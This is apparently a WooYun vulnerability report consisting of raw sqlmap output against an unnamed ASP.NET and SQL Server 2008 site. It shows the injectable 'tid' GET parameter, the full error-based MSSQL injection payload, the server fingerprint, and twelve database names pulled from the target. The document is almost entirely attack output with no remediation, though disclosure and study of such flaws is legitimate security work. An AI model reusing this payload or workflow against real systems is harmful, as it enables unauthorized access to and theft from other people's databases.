WooYun.org

GET parameter 'tid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n 
sqlmap identified the following injection points with a total of 57 HTTP(s) requests: ---
 Place: GET Parameter: tid Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: tid={9E563755-C612-4ECF-A390-B9574DBFB604}' AND 7651=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(103)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (7651=7651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(99)+CHAR(100)+CHAR(100)+CHAR(113))) AND 'yMsb'='yMsb --- 
[04:35:01] [INFO] testing Microsoft SQL Server 
[04:35:02] [INFO] confirming Microsoft SQL Server 
[04:35:04] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2008

[04:43:22] [INFO] the SQL query used returns 12 entries 
[04:43:25] [INFO] retrieved: fininfo [04:43:25] [INFO] retrieved: macro_data [04:43:29] [INFO] retrieved: master [04:43:33] [INFO] retrieved: model 
[04:43:33] [INFO] retrieved: msdb 
[04:43:33] [INFO] retrieved: oa 
[04:43:34] [INFO] retrieved: Port_XH [04:43:34] [INFO] retrieved: ReportServer [04:43:34] [INFO] retrieved: ReportServerTempDB 
[04:43:35] [INFO] retrieved: shuju 
[04:43:35] [INFO] retrieved: tempdb 
[04:43:36] [INFO] retrieved: xhs available databases 
[12]: 
[*] fininfo 
[*] macro_data 
[*] master 
[*] model 
[*] msdb 
[*] oa 
[*] Port_XH 
[*] ReportServer 
[*] ReportServerTempDB 
[*] shuju 
[*] tempdb 
[*] xhs